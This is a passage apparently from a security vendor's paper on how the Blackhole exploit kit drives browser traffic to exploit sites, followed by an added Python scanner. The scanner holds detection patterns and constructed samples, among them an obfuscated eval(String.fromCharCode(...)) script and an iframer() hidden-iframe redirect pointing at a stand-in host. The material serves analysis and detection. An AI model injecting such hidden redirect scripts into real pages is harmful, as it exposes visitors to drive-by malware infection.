Exploring the Blackhole exploit kit

In this section I will describe how the kit works in terms of web traffic flow, in order to describe the sequential loading of exploit content before the user is infected with the payload.

2.3.1 Controlling user web traffic

As with all attacks using exploit kits, the first requirement is for the attacker to guide the user’s browser to the exploit site. There are several ways in which this can be achieved. The following two techniques are used by Blackhole:

Compromised web pages. The attackers compromise legitimate web sites/servers so that web pages served include malicious code. When users browse these pages, the malicious code silently loads content from the exploit site. This technique has been used aggressively by Blackhole, with hundreds of thousands of legitimate sites compromised.

Web pages on compromised sites are typically injected with malicious JavaScript. In some cases, simple HTML iframe elements have been used, but JavaScript is preferred since it provides more opportunities for the attackers to hide the malicious code that is injected into the page.

The injected scripts are normally heavily obfuscated, and use a variety of techniques to evade detection. An example compromised page is shown in Figure 3, with the injected script clearly visible at the start of the page. The obfuscation techniques are discussed in more detail in Section 3.

A number of injected JavaScript redirects synonymous with Blackhole have been seen in high volume over the past year. From a Sophos threat name perspective, these include:

Mal/Iframe-V
Mal/Iframe-W
Mal/Iframe-X
Mal/Iframe-Y

Often the injected redirects do not link directly to the Blackhole exploit site. Instead they reference a remote server from which the request is bounced (HTTP 30x redirection) to the exploit site. This approach is probably favoured since it allows user traffic to be sold as a commodity. The server used is often referred to as a Traffic Directing Server (TDS). This may explain why some of these redirects have been seen leading to other exploit kits, not just Blackhole.

Figure 3: Snippet of code from a web page compromised for Blackhole redirection. The heavily obfuscated script injected into the page is blocked by Sophos as Mal/Iframe-W.

The payload of the injected script from Figure 3 is a simple iframe, as shown in Figure 4.

Figure 4: Deobfuscated redirection script from Figure 3 revealing the characteristic function iframer() payload (in this case to a server which bounces the request to the exploit site).

Of course there are myriad ways in which user traffic can be controlled. Sometimes sites do not have to be compromised at all. Recently it was reported that affiliate schemes are abused in order to redirect users to Blackhole. In these attacks, webmasters willingly add links to third-party code in return for payment (1 dollar for every 1000 page loads). The fly in the ointment was that some of the unsuspecting users were subsequently redirected to Blackhole.

Spam messages. Despite years of user education warning of the dangers of links or attachments in email messages, spam continues to be a useful tool for attackers to trick users. Figure 5 shows two spam messages that illustrate the typical ways in which spam is used for tricking users into browsing to Blackhole exploit sites.

The first example (Figure 5a) uses a simple URL link within the email message. The linked page (normally hosted on a compromised site) loads simple JavaScript content to redirect to the Blackhole site. This redirect is normally achieved via a single-line document.location= or window.location= statement.

The second example (Figure 5b) shows an email message containing an HTML attachment. The usual flavours of social engineering are used to entice the recipient into opening the attachment.

The obfuscation techniques used in these HTML attachments are consistent with those used in the JavaScript injected into compromised sites (see above). In fact, the scripts are essentially the same – once deobfuscated, the same function iframer() redirection payload is evident.
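As an added example (not code from the paper or from Sophos), the following Python scanner flags the page-level indicators this section describes for both injected scripts on compromised sites and HTML spam attachments: the characteristic iframer() payload, hidden iframes, one-line document.location=/window.location= redirects, and heavily obfuscated decoder scripts. The regex thresholds, the sample pages and the tds.invalid host are assumptions constructed for the example.

```python
import re

# Heuristics for Blackhole-style injected redirection content. Patterns and
# thresholds are assumptions for this example, not taken from the paper.
IFRAMER_RE = re.compile(r"function\s+iframer\s*\(", re.I)
LOCATION_RE = re.compile(r"\b(?:document|window)\.location\s*=", re.I)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*=\s*['\"]?\s*[01]\b|display\s*:\s*none|visibility\s*:\s*hidden", re.I)
DECODER_RE = re.compile(r"\b(?:eval|unescape|String\.fromCharCode)\s*\(", re.I)
CHARCODE_RUN_RE = re.compile(r"(?:\d{2,3}\s*,\s*){20,}")                 # long char-code arrays
HEX_RUN_RE = re.compile(r"(?:%[0-9a-f]{2}|\\x[0-9a-f]{2}){20,}", re.I)  # long escaped blobs


def scan_page(html: str) -> list:
    """Return the names of indicators found in the page (empty list if clean)."""
    findings = []
    if IFRAMER_RE.search(html):
        findings.append("iframer_payload")
    # An iframe sized 0/1 pixels or styled invisible is the classic silent loader.
    if any(HIDDEN_RE.search(tag.group(0)) for tag in IFRAME_RE.finditer(html)):
        findings.append("hidden_iframe")
    if LOCATION_RE.search(html):
        findings.append("location_redirect")
    # A decoder call combined with a long encoded blob is a strong obfuscation signal.
    if DECODER_RE.search(html) and (CHARCODE_RUN_RE.search(html) or HEX_RUN_RE.search(html)):
        findings.append("obfuscated_script")
    return findings


# Constructed samples (not real Blackhole code). INJECTED mimics the obfuscated
# script of Figure 3, DEOBFUSCATED its decoded form as in Figure 4, SPAM_LANDING
# the one-line redirect of Figure 5a, and CLEAN is a benign page with a video iframe.
_PAYLOAD = ('function iframer(){var f=document.createElement("iframe");'
            'f.width=1;f.height=1;f.src="http://tds.invalid/in.php";'
            'document.body.appendChild(f)}')
INJECTED = ('<html><head><script>eval(String.fromCharCode('
            + ",".join(str(ord(c)) for c in _PAYLOAD) + '));</script></head>'
            '<body>Welcome</body></html>')
DEOBFUSCATED = ('<html><body><iframe src="http://tds.invalid/in.php" width=1 '
                'height=1></iframe><script>' + _PAYLOAD + '</script></body></html>')
SPAM_LANDING = '<html><script>document.location="http://tds.invalid/go.php";</script></html>'
CLEAN = '<html><body><iframe src="/video" width="640" height="360"></iframe></body></html>'

if __name__ == "__main__":
    for name, page in [("injected", INJECTED), ("deobfuscated", DEOBFUSCATED),
                       ("spam_landing", SPAM_LANDING), ("clean", CLEAN)]:
        print(name, scan_page(page))
```

Note that the encoded page is caught only by the obfuscation heuristic, while the iframer() signature fires only once the script has been decoded; a scanner that relies on the latter alone misses the injected form.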